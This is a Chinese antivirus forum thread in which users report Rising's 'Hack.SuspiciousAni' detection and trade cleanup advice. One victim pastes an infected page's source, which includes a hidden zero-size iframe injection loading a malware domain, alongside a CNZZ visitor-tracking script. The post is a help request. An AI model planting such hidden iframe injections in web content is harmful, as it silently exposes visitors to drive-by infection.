瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 关于Hack.SuspiciousAni的简要解释(4月24日补充)

12345678»   2  /  14  页   跳转

关于Hack.SuspiciousAni的简要解释(4月24日补充)

我刚刚看到瑞星实时监控提示说电脑里发现Hack.SuspiciousAni这个病毒,然后我点了"清除病毒",然后说删除成功.并没有版主所说的"重启后删除"想请问一下,是不是也是按版主所说的清空IE临时文件夹后,再打补丁就可以了?如果不是,请问要怎么解决呢?
gototop
 

哈哈 顶一下  想当年的JPEG漏洞  瑞星也报警了
gototop
 

还是不行啊,按你说的虽然不会中毒了,但还是老是跳出提示栏杀毒,不只一种毒还好几种呢,按置顶的贴子做了也不行,一登陆系统一会就提示杀毒,刚开了冰刃了才好点,到底怎么做才能彻底杀毒啊,我现在只上卡卡社区看贴子也提示杀毒.郁闷.
gototop
 

该用户帖子内容已被屏蔽
gototop
 

gototop
 

实际上IE临时文件夹有个隐藏的“IE5”呢。

没见有几个会手工删除里面的文件的。

gototop
 

不行,上面的方法全都看了,都不好用。我临时文件里的毒,显示的连接网址是http://4255.biz/,,,,,这个就是病毒的网页啊,我打开任何一个网页,都会打开4255.biz这个网页。
这是其中被打开的网页,编辑的内容是:
<iframe src=http://4255.biz/ width=0 height=0 frameborder=0></iframe>                                                    var expireDate=new Date();
var hours=expireDate.getHours();
var minutes=expireDate.getMinutes();
var seconds=expireDate.getSeconds();
var now=expireDate.getTime();
function getCookieVal_cnzz (offset){var endstr = document.cookie.indexOf(";",offset);
if (endstr==-1)
endstr=document.cookie.length;
return unescape(document.cookie.substring(offset,endstr));}
function GetCookie_cnzz(name){
var arg=name+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i< clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg)
return getCookieVal_cnzz(j);
i=document.cookie.indexOf(" ",i) + 1;
if(i==0)break;}
return null;}
var agt=navigator.userAgent.toLowerCase();
data='&agt='+escape(agt)+'&r='+escape(document.referrer)+ '&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage) + '&OS=' + escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.90730700 1177077018';
cnzz_a=GetCookie_cnzz("cnzz02");
if(cnzz_a!=null){cnzz_a=parseInt(cnzz_a);cnzz_a=cnzz_a+1;}
else cnzz_a=0;
data=data+'&repeatip='+cnzz_a;
rtime=GetCookie_cnzz("rtime");
ltime=GetCookie_cnzz("ltime");
cnzz_eid=GetCookie_cnzz("cnzz_eid");
if(cnzz_eid == null){cnzz_eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;}
if(ltime< 1000000){rtime=0;ltime=0;}
else rtime=parseInt(rtime);
if(rtime< 1) rtime=0;
ltime=parseInt(ltime);
now=parseInt(now);
if(((now-ltime)>43200*1000)&&(ltime>0))
rtime=rtime+1 ;
data=data+'&rtime='+rtime+'&cnzz_eid='+escape(cnzz_eid);
data=data+'&showp='+escape(screen.width+'x'+screen.height) ;
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=468635" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="http://s116.cnzz.com/stat.htm?id=468635'+ data +'" border="0" width="0" height="0">');
var lefttime=1000*(86400-hours*3600-minutes*60-seconds);expireDate.setTime(expireDate.getTime() + 500*86400);document.cookie="cnzz02="+cnzz_a+"; expires="+expireDate.toGMTString()+ "; path=/";
var lefttime=1000*86400*182;expireDate.setTime(now + lefttime);document.cookie="rtime="+rtime+";expires="+expireDate.toGMTString()+ ";path=/";document.cookie="ltime="+now+";expires=" + expireDate.toGMTString()+ ";path=/";document.cookie="cnzz_eid="+escape(cnzz_eid)+ ";expires="+expireDate.toGMTString()+";path=/";


补丁也打了,还是不行啊
gototop
 

下载补丁了就会好了吗?
真的被这个病毒给弄疯掉了
gototop
 

学习``
gototop
 

我没有碰到呀.运气挺好的
gototop
 
12345678»   2  /  14  页   跳转
页面顶部
Powered by Discuz!NT